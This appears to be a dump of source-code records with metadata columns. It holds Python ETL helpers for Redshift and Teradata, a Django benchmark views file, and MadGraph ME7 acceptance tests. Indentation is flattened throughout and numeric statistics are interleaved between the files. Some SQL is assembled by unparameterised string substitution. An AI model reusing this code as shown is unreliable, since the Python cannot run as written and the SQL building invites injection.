if idx == 0 and saved_dates['day_idnt'][0] != pd.to_datetime(row['start_date']):
print(Fore.RED + f'''latest saved data date in table is {str(saved_dates['day_idnt'][0])} ...''')
# bump up start range:
new_start = str(pd.to_datetime(str(saved_dates['day_idnt'][0])) + pd.DateOffset(1))[:10]
print(Fore.RED + f'''revising start date to: {new_start} to {row['end_date']}''')
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(src=loop_src1,
src2=loop_src2,
src3=loop_src3,
start=new_start,
end=row['end_date'])
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{new_start} to {row['end_date']}' as dt_range,"
)
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{new_start}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{new_start}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{new_start}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
else:
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(
start=row['start_date'],
end=row['end_date'],
src=loop_src1,
src2=loop_src2,
src3=loop_src3
)
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{row['start_date']} to {row['end_date']}' as dt_range,"
)
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{row['start_date']}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{row['start_date']}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{row['start_date']}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
if idx == 0 and override:
sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
else:
sql_prefix = f"INSERT INTO {tgt_tbl} "
Export.dump_sql(obj=sql_prefix + sql,
dir=log_dir + f"{tgt_tbl}_{idx}.sql")
cls.run_query_rs(conn=conn, sql=sql_prefix + sql)
@classmethod
def sequential_load_rs_wk(cls,
rptg_dates,
override,
tgt_tbl,
conn,
rptg_wk,
rptg_wk_start,
rptg_wk_end,
sql_loop_fn,
# filter dates set 1
filter_dt_field1=False,
filter_dt_type1=False,
filter_dt_placeholder1=False,
# filter dates set 2
filter_dt_field2=False,
filter_dt_type2=False,
filter_dt_placeholder2=False,
# filter dates set 3
filter_dt_field3=False,
filter_dt_type3=False,
filter_dt_placeholder3=False,
log_dir=False
):
"""
:param rptg_dates:
:param override:
:param tgt_tbl:
:param conn:
:param rptg_wk:
:param rptg_wk_start:
:param rptg_wk_end:
:param sql_loop_fn:
:param filter_dt_field1:
:param filter_dt_type1:
:param filter_dt_placeholder1:
:param filter_dt_field2:
:param filter_dt_type2:
:param filter_dt_placeholder2:
:param filter_dt_field3:
:param filter_dt_type3:
:param filter_dt_placeholder3:
:param log_dir:
:return:
"""
# dropping table if override = True
if override:
print(f'''table override True: Dropping table: {tgt_tbl} ''')
try:
cls.run_query_rs(conn=conn, sql=f'''drop table {tgt_tbl}''')
except:
conn.commit()
pass
for idx, row in rptg_dates.iterrows():
print(f'''{row['start_date']} to {row['end_date']}''')
# date range column for logging
sql = sql_loop_fn.replace(
rptg_wk,
f" '{row['rptg_wk']}' as rptg_wk,"
)
sql = sql.replace(
rptg_wk_start,
f" '{row['start_date']}' as rptg_wk_start,"
)
sql = sql.replace(
rptg_wk_end,
f" '{row['end_date']}' as rptg_wk_end,"
)
# date filters
sql = sql.replace(
filter_dt_placeholder1,
f" AND date({filter_dt_field1}) > '{row['start_date']}' "
f" AND date({filter_dt_field1}) <= '{row['end_date']}'"
)
# check for other date fields
if filter_dt_placeholder2:
if filter_dt_type2 == "range":
sql = sql.replace(
filter_dt_placeholder2,
f" AND date({filter_dt_field2}) > '{row['start_date']}' "
f" AND date({filter_dt_field2}) <= '{row['end_date']}'"
)
elif filter_dt_type2 == "<=":
sql = sql.replace(
filter_dt_placeholder2,
f" AND date({filter_dt_field2}) <= '{row['end_date']}'"
)
if filter_dt_placeholder3:
if filter_dt_type3 == "range":
sql = sql.replace(
filter_dt_placeholder3,
f" AND date({filter_dt_field3}) > '{row['start_date']}' "
f" AND date({filter_dt_field3}) <= '{row['end_date']}'"
)
elif filter_dt_type3 == "<=":
sql = sql.replace(
filter_dt_placeholder3,
f" AND date({filter_dt_field3}) <= '{row['end_date']}'"
)
if idx == 0 and override:
sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
else:
sql_prefix = f"INSERT INTO {tgt_tbl} "
Export.dump_sql(obj=sql_prefix + sql,
dir=log_dir + f"{tgt_tbl}_{idx}.sql")
try:
cls.run_query_rs(conn=conn, sql=sql_prefix + sql)
except Exception as e:
print(str(e))
conn.commit()
break
class Teradata:
"""
Generic functions for Teradata SQL queries and ETL.
.. image:: ../images_source/db_etl_tools/teradata.png
"""
@classmethod
def insert_td(cls, tbl, df, conn, batch_size=False, date_cols=False):
"""
Executes an INSERT INTO statement for a given Pandas DataFrame.
:param tbl: Teradata table name.
:param df: Pandas DataFrame.
:param conn: Teradata connection object.
:param batch_size: Records to load per batch.
:param date_cols: A list of date columns to convert to Pandas datetime.
:return: Printed SQL statements for each step.
"""
print(f"batch size: {batch_size}")
if type(df) != type(pd.DataFrame()):
print("Detected something other than a DataFrame\n Please use a pandas DataFrame")
raise TypeError('Unsupported object type!')
if date_cols:
# Convert columns to a date object for loading
# TD is picky, and wants 'YYYY-MM-DD' dates
print(' ...Attempting to convert elligible columns to date')
for idx, column in enumerate(date_cols):
df[column] = pd.to_datetime(df[column], errors='ignore')
date_columns = list(df.select_dtypes(include=[np.datetime64]).columns)
print(f" {len(date_columns)} date column(s) found")
for column in date_columns:
df[column] = df[column].dt.strftime('%Y-%m-%d')
sql_vars = ('?, ' * (len(df.columns) - 1)) + '?'
sql = f"insert into {tbl} values({sql_vars})"
data = df
print(" ...Beginning bulk insert operation")
if not batch_size:
batch_size = 10000
try:
print(f"{len(range(0, int(np.floor(df.shape[0] / batch_size) + 1)))} batches found")
for i in range(0, int(np.floor(df.shape[0] / batch_size) + 1)):
data_sample = [tuple(x) for x in data.iloc[batch_size * i:batch_size * (i + 1), :].values]
conn.executemany(sql, data_sample, batch=True)
print(sql)
print(f" ...Completed batch {i} of {len(range(0, int(np.floor(df.shape[0] / batch_size) + 1)))}")
except Exception as e:
print(data.head())
raise e
print(' ...Successfully loaded Data into Teradata')
return None
@classmethod
def run_query_td(cls, conn, sql):
"""
Executes a SQL statement with a Teradata database connection.
:param conn: Teradata database connection object.
:param sql: SQL statement to execute.
:return: Elapsed time to execute query.
"""
rptg_tstart = datetime.now()
conn.execute(sql)
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def make_tbl_td(cls, df, tbl_name):
"""
Creates SQL to run a CREATE TABLE statement based on a Pandas DataFrame.
:param df: Pandas DataFrame.
:param tbl_name: Teradata table name.
:return: CREATE TABLE SQL statement.
"""
# fix columns
df = cls.make_db_cols(df)
# loop thru the columns
for idx, col in enumerate(df):
# find the max length of each field
col_desc = col + "-" + str(df[col].map(lambda x: len(str(x))).max())
# find the max value of each fields
try:
col_max = col + "-" + str(max(df[col]))
except:
col_max = col + "-" + 'NA'
if idx == 0:
col_desc_all = [col_desc]
col_max_all = [col_max]
else:
col_desc_all.append(col_desc)
col_max_all.append(col_max)
# make df of column lengths
col_desc_all = pd.DataFrame(col_desc_all)
col_desc_all.columns = ["char"]
col_desc_all['column'], col_desc_all['length'] = \
col_desc_all['char'].str.split('-', 1).str
# make df of column max
col_max_all = pd.DataFrame(col_max_all)
col_max_all.columns = ["char"]
col_max_all['column'], col_max_all['max'] = \
col_max_all['char'].str.split('-', 1).str
# make df of column dtypes
col_desc_types = pd.DataFrame(df.dtypes).reset_index()
col_desc_types.columns = ["column", "type"]
# join dfs
col_desc_all = pd.merge(
col_desc_all,
col_desc_types,
how="inner",
on="column")
col_desc_all = pd.merge(
col_desc_all,
col_max_all[["column", "max"]],
how="inner",
on="column")
# define data type mapping (pandas --> teradata)
d = {'object': 'VARCHAR',
'int64': 'INTEGER',
"Int64": "INTEGER",
'int32': 'INTEGER',
'bool': 'VARCHAR',
'float64': 'FLOAT',
'datetime64[ns]': 'DATE'}
col_desc_all = col_desc_all.replace(d)
# list the columns where you want to specify the lengths
col_desc_all['concat'] = np.where(
# if varchar, use the length of the longest char
col_desc_all['type'] == "VARCHAR",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str) + \
"(" + col_desc_all['length'] + ")",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str))
# convert integers with a max val over certain amount to varchar
for idx, row in col_desc_all.iterrows():
if str(row['type']) == 'INTEGER' and row['max'] != "nan" and int(row['max']) > 2147483647:
val = row['concat']
col_desc_all.loc[idx, 'concat'] = \
val.replace(
" INTEGER",
f" VARCHAR({row['length']})")
col_desc_all = col_desc_all.apply(', '.join).reset_index()
col_desc_all.columns = ["index", "statement"]
statement = col_desc_all[col_desc_all['index'] == 'concat']
sql = statement['statement'].values
sql = str(sql)
sql = sql.replace("[", "")
sql = sql.replace("]", "")
sql = "CREATE TABLE " + tbl_name + " ( " + sql + " )"
sql = sql.replace("'", "")
return sql
@classmethod
def make_tbl_complete_td(cls, df, tbl_name, conn, batch_size=False):
"""
Executes a series of SQL statements to CREATE and INSERT into a table from a Pandas DataFrame.
:param df: Pandas DataFrame to create a table from.
:param tbl_name: Name of table to be created.
:param conn: Teradata database connection object.
:param batch_size: Records to load per batch.
:return: Elapsed time to execute query.
"""
# 1 drop the table
print(f"dropping table: {tbl_name}")
try:
cls.run_query_td(sql=f"drop table {tbl_name}", conn=conn)
except:
print(f"table doesn't exist: {tbl_name}")
pass
# create the table
print(f"creating table: {tbl_name}")
sql = cls.make_tbl_td(df=df, tbl_name=tbl_name)
print(sql)
cls.run_query_td(sql=sql, conn=conn)
print(f"inserting DF values into table: {tbl_name}")
rptg_tstart = datetime.now()
cls.insert_td(df=df, tbl=tbl_name, conn=conn, batch_size=batch_size)
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
| 38.668269
| 148
| 0.494117
| 9,902
| 88,473
| 4.167239
| 0.051101
| 0.022392
| 0.026173
| 0.015995
| 0.87483
| 0.86109
| 0.851154
| 0.840321
| 0.830312
| 0.825441
| 0
| 0.013417
| 0.393431
| 88,473
| 2,287
| 149
| 38.685177
| 0.755502
| 0.174573
| 0
| 0.803776
| 0
| 0.012138
| 0.178072
| 0.042923
| 0.000674
| 0
| 0
| 0
| 0
| 1
| 0.022927
| false
| 0.006069
| 0.008092
| 0
| 0.045853
| 0.047876
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8bef16ac4e836c485ded3cc83ef19a8b845b1ad
| 2,058
|
py
|
Python
|
passe-sample-apps/benchmarking/benchapp/views.py
|
kantai/passe-framework-prototype
|
51a441b689c54cfd57748129f77fde3c7a08e5c3
|
[
"BSD-3-Clause"
] | 3
|
2016-07-06T16:34:38.000Z
|
2021-02-10T08:06:23.000Z
|
passe-sample-apps/benchmarking/benchapp/views.py
|
kantai/passe-framework-prototype
|
51a441b689c54cfd57748129f77fde3c7a08e5c3
|
[
"BSD-3-Clause"
] | null | null | null |
passe-sample-apps/benchmarking/benchapp/views.py
|
kantai/passe-framework-prototype
|
51a441b689c54cfd57748129f77fde3c7a08e5c3
|
[
"BSD-3-Clause"
] | 2
|
2020-06-22T20:55:48.000Z
|
2021-01-15T18:01:04.000Z
|
# Create your views here.
from django.http import HttpResponse
from benchmarking.benchapp.models import Foo
def i0(request):
return HttpResponse("Hello, world. You're at the poll index %s." % 1)
def i1(request):
l = ""
for i in range(0,1):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
def i2(request):
l = ""
for i in range(0,2):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
def i3(request):
l = ""
for i in range(0,3):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
def i4(request):
l = ""
for i in range(0,4):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
def i5(request):
l = ""
for i in range(0,5):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
def i6(request):
l = ""
for i in range(0,6):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
def i7(request):
l = ""
for i in range(0,7):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
def i8(request):
l = ""
for i in range(0,8):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
def i9(request):
l = ""
for i in range(0,9):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
def i10(request):
l = ""
for i in range(0,10):
l += str(len(Foo.objects.filter(databar="")))
return HttpResponse("Hello, world. You're at the poll index %s." % l)
| 34.881356
| 77
| 0.584548
| 320
| 2,058
| 3.759375
| 0.178125
| 0.164589
| 0.210308
| 0.256027
| 0.885287
| 0.885287
| 0.885287
| 0.719036
| 0.719036
| 0.719036
| 0
| 0.021921
| 0.246356
| 2,058
| 58
| 78
| 35.482759
| 0.753707
| 0.011176
| 0
| 0.555556
| 0
| 0
| 0.22725
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.203704
| false
| 0
| 0.037037
| 0.018519
| 0.444444
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a8c71b480b790d5f56e12edbb0b5534670984fe2
| 28,861
|
py
|
Python
|
tests/acceptance_tests/test_ME7.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 1
|
2019-12-14T15:25:38.000Z
|
2019-12-14T15:25:38.000Z
|
tests/acceptance_tests/test_ME7.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 26
|
2018-10-08T15:49:32.000Z
|
2020-05-15T13:33:36.000Z
|
tests/acceptance_tests/test_ME7.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 2
|
2019-03-25T17:28:48.000Z
|
2021-04-21T12:15:53.000Z
|
################################################################################
#
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
################################################################################
import subprocess
import unittest
import os
import re
import shutil
import sys
import logging
import random
import timeit
pjoin = os.path.join
logger = logging.getLogger('test_ME7')
import tests.unit_tests.iolibs.test_file_writers as test_file_writers
import madgraph.interface.master_interface as Cmd
import madgraph.interface.ME7_interface as ME7_interface
import madgraph.integrator.ME7_integrands as ME7_integrands
from madgraph.core.accessors import ProcessKey
import madgraph.various.misc as misc
_file_path = os.path.dirname(os.path.realpath(__file__))
_pickle_path =os.path.join(_file_path, 'input_files')
from madgraph import MG4DIR, MG5DIR, MadGraph5Error, InvalidCmd
debugging_warning = ' /!\ USE ONLY FOR DEBUGGING /!\ '
debugging_written = 'Output for %s written at %s'
debugging_reused = 'Reusing output for %s written at %s'
def get_test_IR_limit_cmd(options):
options_str = ' '.join(
('--%s=%s' % (key, value) if value is not None else '--%s' % key)
for key, value in options.items()
)
return 'test_IR_limits ' + options_str
#===============================================================================
# TestME7 colorful output for e+ e- > j j j @NLO
#===============================================================================
class TestME7_NLO_colorful_epem_jjj(unittest.TestCase):
"""This test validates the command 'test_IR_limits' of ME7 in the colorful scheme
as well as integrand calls for the process e+ e- > j j j --NLO=QCD"""
# If the debug mode is set to True, then the process output is not refreshed
# but reused instead
debugging = False
is_process_generated = False
def setUp(self):
self.tmp_process_dir = pjoin(_file_path, 'TMP_TestME7_colorful_epem_jjj_output')
# Generate the process output if it does not exist yet or if we
# are not in debug mode.
if os.path.isdir(self.tmp_process_dir):
if not self.is_process_generated and not self.debugging:
shutil.rmtree(self.tmp_process_dir)
else:
TestME7_NLO_colorful_epem_jjj.is_process_generated = True
if not self.is_process_generated:
self.cmd = Cmd.MasterCmd()
if os.path.isdir(self.tmp_process_dir):
shutil.rmtree(self.tmp_process_dir)
# Now generate and output a process, so as to run ME7 commands on it
self.do('import model loop_sm')
self.do('set subtraction_scheme colorful')
self.do('generate e+ e- > j j j --NLO=QCD')
self.do('output %s' % self.tmp_process_dir)
TestME7_NLO_colorful_epem_jjj.is_process_generated = True
if self.debugging:
misc.sprint(debugging_warning)
misc.sprint(
debugging_written % (self.__class__.__name__, self.tmp_process_dir))
else:
if self.debugging:
misc.sprint(debugging_warning)
misc.sprint(
debugging_reused % (self.__class__.__name__, self.tmp_process_dir))
# Now initialize an ME7 interface on the above process output
self.cmd = ME7_interface.MadEvent7Cmd(me_dir=self.tmp_process_dir)
self.cmd.no_notification()
def __del__(self):
if os.path.isdir(self.tmp_process_dir) and not self.debugging:
shutil.rmtree(self.tmp_process_dir)
def do(self, line):
""" exec a line in the cmd under test """
self.cmd.exec_cmd(line)
def verify_ME7_test_results(self, results_file):
"""Parse and verify that all tests output in 'results_file_path' are passed."""
full_path = pjoin(self.tmp_process_dir, results_file)
for line in open(full_path,'r').read().split('\n'):
process, limit, outcome, ratio = line.split('|')[:4]
self.assertTrue(outcome.strip()=='PASSED', line)
def test_ME7_colorful_ggqqx_collinear_limits(self):
options = {'correction_order' : 'NLO',
'limits' : 'purecollinear',
'counterterms' : 'all',
'process' : 'e+ e- > g g d d~',
'show_plots' : False,
'save_plots' : False,
'seed' : 666,
'n_steps' : 10,
'min_scaling_variable' : 1.0e-7,
'acceptance_threshold' : 5.0e-3,
'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_colorful_ggqqx_soft_limits(self):
options = {'correction_order' : 'NLO',
'limits' : 'puresoft',
'counterterms' : 'all',
'process' : 'e+ e- > g g d d~',
'show_plots' : False,
'save_plots' : False,
'seed' : 666,
'n_steps' : 10,
'min_scaling_variable' : 1.0e-11,
'acceptance_threshold' : 1.0e-5,
'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_colorful_ggqqx_softcollinear_limits(self):
options = {'correction_order' : 'NLO',
'limits' : "r'^\(C\(S.*$'",
'counterterms' : 'all',
'process' : 'e+ e- > g g d d~',
'show_plots' : False,
'save_plots' : False,
'seed' : 666,
'n_steps' : 20,
'min_scaling_variable' : 1.0e-12,
'acceptance_threshold' : 1.0e-2,
'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_colorful_qqxqqx_collinear_limits(self):
options = {'correction_order' : 'NLO',
'limits' : 'collinear',
'counterterms' : 'all',
'process' : 'e+ e- > d d~ d d~',
'show_plots' : False,
'save_plots' : False,
'seed' : 666,
'n_steps' : 10,
'min_scaling_variable' : 1.0e-7,
'acceptance_threshold' : 5.0e-4,
'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_born_integrand_call(self):
"""Check the result of a single call to the born integrand_call."""
born_integrand = self.cmd.all_integrands.get_integrands_of_type(
ME7_integrands.ME7Integrand_B)[0]
dimensions = born_integrand.get_dimensions()
def call():
born_integrand(
dimensions.get_continuous_dimensions().random_sample(),
dimensions.get_discrete_dimensions().random_sample(),
cache_active=True )
n_calls = 1000
with ME7_interface.ME7RunEnvironment(silence=True, loggers=logging.CRITICAL ):
timing = [
1.e3*(res/float(n_calls))
for i, res in enumerate(timeit.repeat(call, number=n_calls, repeat=2)) ]
res = '\n'+'\n'.join('%d : %g ms'%(i+1, res) for i, res in enumerate(timing))
self.assertTrue(
(timing[0] < 50.0),
'Born integrand call too slow: %g ms'%(timing[0]) )
def test_ME7_real_integrand_call(self):
"""Check the result of a single call to the real integrand_call."""
real_integrand = self.cmd.all_integrands.get_integrands_of_type(
ME7_integrands.ME7Integrand_R)[0]
dimensions = real_integrand.get_dimensions()
def call():
real_integrand(
dimensions.get_continuous_dimensions().random_sample(),
dimensions.get_discrete_dimensions().random_sample(),
cache_active=False )
n_calls = 100
with ME7_interface.ME7RunEnvironment(silence=True, loggers=logging.CRITICAL):
timing = [
1.e3*(res/float(n_calls))
for i, res in enumerate(timeit.repeat(call, number=n_calls, repeat=2)) ]
res = '\n'+'\n'.join('%d : %g ms'%(i+1, res) for i, res in enumerate(timing))
self.assertTrue(
(timing[0] < 500.0),
'Real integrand call too slow: %g ms'%(timing[0]) )
def test_ME7_virtual_integrand_call(self):
"""Check the result of a single call to the virtual integrand_call."""
virtual_integrand = self.cmd.all_integrands.get_integrands_of_type(
ME7_integrands.ME7Integrand_V)[0]
dimensions = virtual_integrand.get_dimensions()
def call():
virtual_integrand(
dimensions.get_continuous_dimensions().random_sample(),
dimensions.get_discrete_dimensions().random_sample(),
cache_active=False )
n_calls = 100
with ME7_interface.ME7RunEnvironment(silence=True, loggers=logging.CRITICAL):
timing = [
1.e3*(res/float(n_calls))
for i, res in enumerate(timeit.repeat(call, number=n_calls, repeat=2)) ]
res = '\n'+'\n'.join('%d : %g ms'%(i+1, res) for i,res in enumerate(timing))
self.assertTrue(
(timing[0] < 500.0),
'Virtual integrand call too slow: %g ms'%(timing[0]) )
#===============================================================================
# TestME7 cataniseymour output for e+ e- > j j j @NLO
#===============================================================================
class TestME7_NLO_cataniseymour_epem_jjj(unittest.TestCase):
"""This test validates the command 'test_IR_limits' of ME7 in the cataniseymour scheme
for the process e+ e- > j j j --NLO=QCD"""
# If the debug mode is set to True, then the process output is not refreshed
# but reused instead
debugging = False
is_process_generated = False
def setUp(self):
self.tmp_process_dir = pjoin(_file_path, 'TMP_TestME7_cataniseymour_epem_jjj_output')
# Generate the process output if it does not exist yet or if we
# are not in debug mode.
if os.path.isdir(self.tmp_process_dir):
if not self.is_process_generated and not self.debugging:
shutil.rmtree(self.tmp_process_dir)
else:
TestME7_NLO_cataniseymour_epem_jjj.is_process_generated = True
if not self.is_process_generated:
self.cmd = Cmd.MasterCmd()
if os.path.isdir(self.tmp_process_dir):
shutil.rmtree(self.tmp_process_dir)
# Now generate and output a process, so as to run ME7 commands on it
self.do('import model loop_sm')
self.do('set subtraction_scheme cataniseymour')
self.do('generate e+ e- > j j j --NLO=QCD --ignore_contributions=V')
self.do('output %s --ignore_integrated_counterterms=R' % self.tmp_process_dir)
TestME7_NLO_cataniseymour_epem_jjj.is_process_generated = True
if self.debugging:
misc.sprint(debugging_warning)
misc.sprint(
debugging_written % (self.__class__.__name__, self.tmp_process_dir))
else:
if self.debugging:
misc.sprint(debugging_warning)
misc.sprint(
debugging_reused % (self.__class__.__name__, self.tmp_process_dir))
# Now initialize an ME7 interface on the above process output
self.cmd = ME7_interface.MadEvent7Cmd(me_dir=self.tmp_process_dir)
self.cmd.no_notification()
def __del__(self):
if os.path.isdir(self.tmp_process_dir) and not self.debugging:
shutil.rmtree(self.tmp_process_dir)
def do(self, line):
""" exec a line in the cmd under test """
self.cmd.exec_cmd(line)
def verify_ME7_test_results(self, results_file):
"""Parse and verify that all tests output in 'results_file_path' are passed."""
full_path = pjoin(self.tmp_process_dir, results_file)
for line in open(full_path, 'r').read().split('\n'):
process, limit, outcome, ratio = line.split('|')[:4]
self.assertTrue(outcome.strip() == 'PASSED', line)
def test_ME7_cataniseymour_ggqqx_collinear_limits(self):
options = {'correction_order' : 'NLO',
'limits' : 'purecollinear',
'counterterms' : 'all',
'process' : 'e+ e- > g g d d~',
'show_plots' : False,
'save_plots' : False,
'seed' : 666,
'n_steps' : 10,
'min_scaling_variable' : 1.0e-7,
'acceptance_threshold' : 5.0e-4,
'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_cataniseymour_ggqqx_soft_limits(self):
options = {'correction_order' : 'NLO',
'limits' : "['S(3)','S(4)']",
'counterterms' : 'all',
'process' : 'e+ e- > g g d d~',
'show_plots' : False,
'save_plots' : False,
'seed' : 666,
'n_steps' : 10,
'min_scaling_variable' : 1.0e-7,
'acceptance_threshold' : 5.0e-4,
'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_cataniseymour_ggqqx_softcollinear_limits(self):
options = {'correction_order' : 'NLO',
'limits' :
"['C(S(3),4)','C(S(3),5)','C(S(3),6)','C(S(4),3)','C(S(4),5)','C(S(4),6)']",
'counterterms' : 'all',
'process' : 'e+ e- > g g d d~',
'show_plots' : False,
'save_plots' : False,
'seed' : 666,
'n_steps' : 10,
'min_scaling_variable' : 1.0e-9,
'acceptance_threshold' : 1.0e-4,
'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_cataniseymour_qqxqqx_collinear_limits(self):
options = {'correction_order' : 'NLO',
'limits' : 'collinear',
'counterterms' : 'all',
'process' : 'e+ e- > d d~ d d~',
'show_plots' : False,
'save_plots' : False,
'seed' : 666,
'n_steps' : 10,
'min_scaling_variable' : 1.0e-7,
'acceptance_threshold' : 5.0e-4,
'save_results_to_path' : 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
#===============================================================================
# TestME7 colorful output for p p > j j @NLO
#===============================================================================
class TestME7_NLO_colorful_pp_jj(unittest.TestCase):
"""This test validates the command 'test_IR_limits' of ME7 in the colorful scheme
as well as integrand calls for the process p p > j j --NLO=QCD"""
# If the debug mode is set to True, then the process output is not refreshed
# but reused instead
debugging = False
is_process_generated = False
def setUp(self):
""" basic building of the class to test """
self.tmp_process_dir = pjoin(_file_path, 'TMP_TestME7_colorful_pp_jj_output')
# Generate the process output if it does not exist yet or if we
# are not in debug mode.
if os.path.isdir(self.tmp_process_dir):
if not self.is_process_generated and not self.debugging:
shutil.rmtree(self.tmp_process_dir)
else:
TestME7_NLO_colorful_pp_jj.is_process_generated = True
if not self.is_process_generated:
self.cmd = Cmd.MasterCmd()
if os.path.isdir(self.tmp_process_dir):
shutil.rmtree(self.tmp_process_dir)
# Now generate and output a process, so as to run ME7 commands on it
self.do('import model loop_sm')
self.do('set subtraction_scheme colorful')
self.do('generate p p > j j --NLO=QCD --ignore_contributions=V')
self.do('output %s --ignore_integrated_counterterms=R' % self.tmp_process_dir)
TestME7_NLO_colorful_pp_jj.is_process_generated = True
if self.debugging:
misc.sprint(debugging_warning)
misc.sprint(
debugging_written % (self.__class__.__name__, self.tmp_process_dir))
else:
if self.debugging:
misc.sprint(debugging_warning)
misc.sprint(
debugging_reused % (self.__class__.__name__, self.tmp_process_dir))
# Now initialize an ME7 interface on the above process output
self.cmd = ME7_interface.MadEvent7Cmd(me_dir=self.tmp_process_dir)
self.cmd.no_notification()
def __del__(self):
if os.path.isdir(self.tmp_process_dir) and not self.debugging:
shutil.rmtree(self.tmp_process_dir)
def do(self, line):
""" exec a line in the cmd under test """
self.cmd.exec_cmd(line)
def verify_ME7_test_results(self, results_file):
"""Parse and verify that all tests output in 'results_file_path' are passed."""
full_path = pjoin(self.tmp_process_dir, results_file)
for line in open(full_path, 'r').read().split('\n'):
process, limit, outcome, ratio = line.split('|')[:4]
self.assertTrue(outcome.strip() == 'PASSED', line)
def test_ME7_colorful_gq_ggq_collinear_limits(self):
"""Check the test of collinear limits on a particular process."""
options = {'correction_order': 'NLO',
'counterterms': 'def',
'process': 'g u > g g u',
'show_plots': False,
'save_plots': False,
'seed': 666,
'n_steps': 10,
'min_scaling_variable': 1.0e-8,
'acceptance_threshold': 5.0e-3,
'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat'
}
